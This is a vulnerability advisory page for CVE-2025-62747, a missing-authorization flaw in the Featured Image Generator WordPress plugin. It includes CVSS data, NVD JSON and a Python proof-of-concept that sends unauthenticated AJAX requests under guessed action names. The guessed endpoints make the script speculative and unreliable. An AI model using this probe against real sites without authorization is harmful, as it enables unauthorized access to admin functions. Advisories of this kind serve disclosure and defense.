Security Vulnerability Report
中文
CVE-2025-62747 CVSS 5.3 MEDIUM

CVE-2025-62747

Published: 2025-12-31 16:15:47
Last Modified: 2026-04-23 15:34:40

Description

Missing Authorization vulnerability in Aum Watcharapon Featured Image Generator featured-image-generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Image Generator: from n/a through <= 1.3.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Featured Image Generator WordPress插件 <= 1.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62747 PoC - Missing Authorization in Featured Image Generator # Affected: Featured Image Generator WordPress Plugin <= 1.3.4 import requests import sys def exploit_cve_2025_62747(target_url): """ Exploit for Missing Authorization vulnerability in Featured Image Generator plugin. This PoC demonstrates how an unauthenticated user can trigger admin-only functions. """ # Target WordPress site base_url = target_url.rstrip('/') # Plugin's AJAX endpoint (common in WordPress plugins) ajax_endpoint = f"{base_url}/wp-admin/admin-ajax.php" # Try common action names used by the plugin possible_actions = [ 'generate_featured_image', 'fig_generate_image', 'featured_image_generator_create', 'fig_create_featured_image' ] print(f"[*] Target: {target_url}") print(f"[*] CVE-2025-62747 Exploitation Test") print(f"[*] Testing {len(possible_actions)} possible action names...") for action in possible_actions: # Construct the request without authentication data = { 'action': action, # Additional parameters might be required based on plugin version 'post_id': 1, 'nonce': '' # Empty nonce to test if validation exists } try: response = requests.post(ajax_endpoint, data=data, timeout=10) # Check if the request was processed without authentication if response.status_code == 200: # Look for indicators of successful exploitation if 'success' in response.text or 'data' in response.text: print(f"[+] Potential vulnerability confirmed!") print(f"[+] Action '{action}' accepted unauthenticated request") print(f"[*] Response: {response.text[:200]}...") return True elif response.status_code == 403: print(f"[-] Action '{action}' blocked (403 Forbidden)") else: print(f"[*] Action '{action}' returned status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing action '{action}': {e}") print("[*] Exploitation test completed.") print("[*] Note: Manual verification may be required.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python CVE-2025-62747.py <target_url>") print("Example: python CVE-2025-62747.py http://example.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_62747(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62747", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:46.800", "lastModified": "2026-04-23T15:34:39.957", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Aum Watcharapon Featured Image Generator featured-image-generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Image Generator: from n/a through <= 1.3.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Aum Watcharapon Featured Image Generator permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Featured Image Generator: desde n/a hasta 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/featured-image-generator/vulnerability/wordpress-featured-image-generator-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}